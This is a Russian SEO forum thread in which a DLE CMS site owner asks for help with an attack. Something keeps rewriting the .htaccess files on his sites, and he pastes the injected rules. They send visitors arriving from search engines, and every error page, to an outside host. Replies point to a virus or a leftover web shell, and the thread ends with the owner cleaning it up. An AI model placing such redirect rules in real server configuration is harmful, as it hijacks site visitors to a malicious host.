Проблемы с .htaccess в DLE CMS - SEO форум MaulTalk.com

Проблемы с .htaccess в DLE CMS, какой-то скрипт автоматически его меняет

Опции

jalil

Topic Starter

16.4.2012, 13:23; Ответить: jalil

Сообщение #1

Новичок

Группа: Viewer
Сообщений: 2
Регистрация: 16.4.2012
Поблагодарили: 0 раз
Репутация:

0

Всем привет!

Столкнулся с неприятной для себя проблемой, пытаюсь решить ее уже долгое время, но никак не получается. Гуглил, яндексил, обращался к хостеру, бился головой об стену - сдвигов никаких. Остается надежда на Вас..

Суть проблемы:

имеется у меня хостинг, на нем около 5 сайтов на DLE. Версии движков разные, но всякие жизненно важные заплатки ставлю по мере возможности, вобщем стараюсь это дело не запускать. Несколько месяцев назад появилась проблема следующего характера - какая то, простите , хрень, меняет автоматом мои файлы .htacess , причем на всех сайтах сразу. В него она прописывает редирект пользователей приходящих на мой сайт с ПС на свои сайты (каждый раз разные).
Пароли менял, файлы сайтов проверял, скачивал на хард и сканировал, шеллов не нашел. Но воз и ныне там.
Сейчас эта ерунда вообще автоматизировалась и овервратит мне .htaccess с периодичностью в каждые полчаса-час.

Скорее всего это какая-то уязвимость в DLE , но где ее искать, может кто-то подскажет?

.htaccess меняется следующим образом:

Развернуть/Свернуть

В самом начале файла автоматом прописывается такая вот ерунда:

<IfModule mod_rewrite.c>
RewriteEngine On                                                                                    RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|baidu|youtube|wikipedia|qq|excite|altavista|msn|netscape|ao
l|hotbot|goto|infoseek|mamma|alltheweb|lycos|search|metacrawler|bing|dogpile|fac
e
book|twitter|blog|live|myspace|mail|yandex|rambler|ya|aport|linkedin|flickr|nigm
a
|liveinternet|vkontakte|webalta|filesearch|yell|openstat|metabot|nol9|zoneru|km|
g
igablast|entireweb|amfibi|dmoz|yippy|search|walhello|webcrawler|jayde|findwhat|t
e
oma|euroseek|wisenut|about|thunderstone|ixquick|terra|lookle|metaeureka|searchsp
o
t|slider|topseven|allthesites|libero|clickey|galaxy|brainysearch|pocketflier|ver
y
goodsearch|bellnet|freenet|fireball|flemiro|suchbot|acoon|cyber-content|devaro|fastbot|netzindex|abacho|allesklar|suchnase|schnellsuche|shareloo
k|sucharchiv|suchbiene|suchmaschine|web-archiv)\.(.*)                                                                            RewriteRule ^(.*)$ http://qimulta.ru/upday/index.php [R=301,L]                                                                                                                                                                RewriteCond %{HTTP_REFERER} ^.*(web|websuche|witch|wolong|oekoportal|t-online|freenet|arcor|alexana|tiscali|kataweb|orange|voila|sfr|startpagina|kpnvan
daag|ilse|wanadoo|telfort|hispavista|passagen|spray|eniro|telia|bluewin|sympatic
o
|nlsearch|atsearch|klammeraffe|sharelook|suchknecht|ebay|abizdirectory|alltheuk|
b
hanvad|daffodil|click4choice|exalead|findelio|gasta|gimpsy|globalsearchdirectory
|
hotfrog|jobrapido|kingdomseek|mojeek|searchers|simplyhired|splut|the-arena|thisisouryear|ukkey|uwe|friendsreunited|jaan|qp|rtl|search-belgium|apollo7|bricabrac|findloo|kobala|limier|express|bestireland|browseirelan
d|finditireland|iesearch|ireland-information|kompass|startsiden|confex|finnalle|gulesider|keyweb|finnfirma|kvasir
|savio|sol|startsiden|allpages|america|botw|chapu|claymont|clickz|clush|ehow|fin
d
how|icq|goo|westaustraliaonline)\.(.*)                                                            RewriteRule ^(.*)$ http://qimulta.ru/upday/index.php [R=301,L]                                                                                                                                                                </IfModule>

В конце файла - вот такая вот:

ErrorDocument 400 http://qimulta.ru/upday/index.php ErrorDocument 401 http://qimulta.ru/upday/index.php
ErrorDocument 403 http://qimulta.ru/upday/index.php
ErrorDocument 404 http://qimulta.ru/upday/index.php
ErrorDocument 500 http://qimulta.ru/upday/index.php

На всякий случай - файл .htaccess после модификации:
_http://dump.ru/file/5697658

Сообщение отредактировал jalil - 16.4.2012, 13:26

1

Ответить с цитированием данного сообщения

Makssss07 Makssss07 20.4.2012, 17:50; Сообщений: 865 Поблагодарили: 265 раз Репутация: 53 Просмотр профиля	20.4.2012, 17:50; Ответить: Makssss07 Сообщение #2
Завсегдатай Группа: Active User Сообщений: 865 Регистрация: 17.5.2010 Из: Питер Поблагодарили: 265 раз Репутация: 53	У меня та же самая история только период замены пока подольше, перешарил все, где сидит гадость так и не нашел. В панели гугла появилась запись на одном сайте об обнаружении вируса. Возможно нужно попробовать его снести? -------------------- ТОЛЧОК 360° Первый российский музыкальный фестиваль в формате 360 градусов

SpaceX SpaceX 20.4.2012, 18:06; Сообщений: 205 Поблагодарили: 66 раз Репутация: 18 Просмотр профиля	20.4.2012, 18:06; Ответить: SpaceX Сообщение #3
Участник Группа: User Сообщений: 205 Регистрация: 13.3.2011 Поблагодарили: 66 раз Репутация: 18	ув. товарищи - поздравляю, у вас вирус. делайте бекапы, меняйте пароли и не сохраняйте их - записывайте на бумаге! )) если хотите почистить сайты велком в ЛС...

bobur bobur 20.4.2012, 20:26; Сообщений: 1526 Поблагодарили: 201 раз Репутация: 60 Просмотр профиля	20.4.2012, 20:26; Ответить: bobur Сообщение #4
Мастер Datalife Engine Группа: Active User Сообщений: 1526 Регистрация: 12.11.2009 Из: Планета Земля Поблагодарили: 201 раз Репутация: 60	Надо поискать шеллы на папках... =) -------------------- Мастер по Datalife Engine на ТУТ. ICQ:359803651. CверхБыстрые VPS/VDS по системе Все включено! 60% скидка. Купон:60OFFAVPS

fioru fioru 20.4.2012, 20:35; Сообщений: 508 Поблагодарили: 172 раза Репутация: 37 Просмотр профиля	20.4.2012, 20:35; Ответить: fioru Сообщение #5
Завсегдатай Группа: Active User Сообщений: 508 Регистрация: 30.11.2010 Из: Смоленск Поблагодарили: 172 раза Репутация: 37	Скорее не шеллы надо искать, а не жадничать и приобретать продукт который стоит своих денег

Makssss07 Makssss07 20.4.2012, 21:38; Сообщений: 865 Поблагодарили: 265 раз Репутация: 53 Просмотр профиля	20.4.2012, 21:38; Ответить: Makssss07 Сообщение #6
Завсегдатай Группа: Active User Сообщений: 865 Регистрация: 17.5.2010 Из: Питер Поблагодарили: 265 раз Репутация: 53	(fioru @ 20.4.2012, 20:35) Скорее не шеллы надо искать, а не жадничать и приобретать продукт который стоит своих денег Продукты, которые стоят своих денег увы тоже подвержены заболеваниям, и если вы с этим не сталкивались, то скорее всего это вопрос времени и везения. Вредокод js найден, был в functions.php, что странно, его там не было раньше 100%, пассы сменил и записал на бумагу, лучше буду мучаться и каждый раз вводить. За подсказку и айболита спасибо большое SpaceX -------------------- ТОЛЧОК 360° Первый российский музыкальный фестиваль в формате 360 градусов

fioru fioru 20.4.2012, 21:46; Сообщений: 508 Поблагодарили: 172 раза Репутация: 37 Просмотр профиля	20.4.2012, 21:46; Ответить: fioru Сообщение #7
Завсегдатай Группа: Active User Сообщений: 508 Регистрация: 30.11.2010 Из: Смоленск Поблагодарили: 172 раза Репутация: 37	Makssss07, скорее вопрос времени что сломают ПО, найдут дыру в другом месте, нежели в ДЛЕ последних версий без всяких посторонних модулей

jalil

Topic Starter сообщение

21.4.2012, 0:56; Ответить: jalil

Сообщение #8

Новичок

Группа: Viewer
Сообщений: 2
Регистрация: 16.4.2012
Поблагодарили: 0 раз
Репутация:

0

Ребятки, посидел часок не отвлекаясь ни на что другое, и проблему вроде как решил собственными силами. Во всяком случае .htaccess не ревратится уже каждые 30 минут.
Проблема была в шелле двухгодичной давности, последствия которого я не снес до конца (сам вобщем-то виноват)...

Я уже забыл, что именно я снес, но : у кого подобные проблемы - внимательно смотрим свой config.php , нижние строчки... Как я понял, подобная кака касается не только DLE , а и всех сайтов на php.

Замечание модератора:
Эта тема была закрыта автоматически ввиду отсутствия активности в ней на протяжении 100+ дней.
Если Вы считаете ее актуальной и хотите оставить сообщение, то воспользуйтесь кнопкой

или обратитесь к любому из модераторов.

« Предыдущая тема · Программная часть · Следующая тема »

1 чел. читают эту тему (гостей: 1, скрытых пользователей: 0)

Пользователей: 0

Похожие темы

Тема	Ответов	Автор	Просмотров	Последний ответ
Перенос сайта на CMS Wordpress	8	freeax	4956	10.3.2024, 14:58 автор: freeax
DLE xProtect	2	xoopw	5977	15.1.2024, 21:06 автор: Diana_Wesley
Обновить сайт на CMS DLE	1	Sawich	1661	2.9.2023, 10:10 автор: WoWeb
[Продам] базы сайтов на CMS Wordpress/Joomla/Drupal/Magento/...	14	phosphoruss	13763	16.8.2023, 15:27 автор: SmmPanelUS
Сайт "под ключ" (дизайн, верстка, CMS)	32	Brans	16529	19.5.2023, 22:01 автор: Brans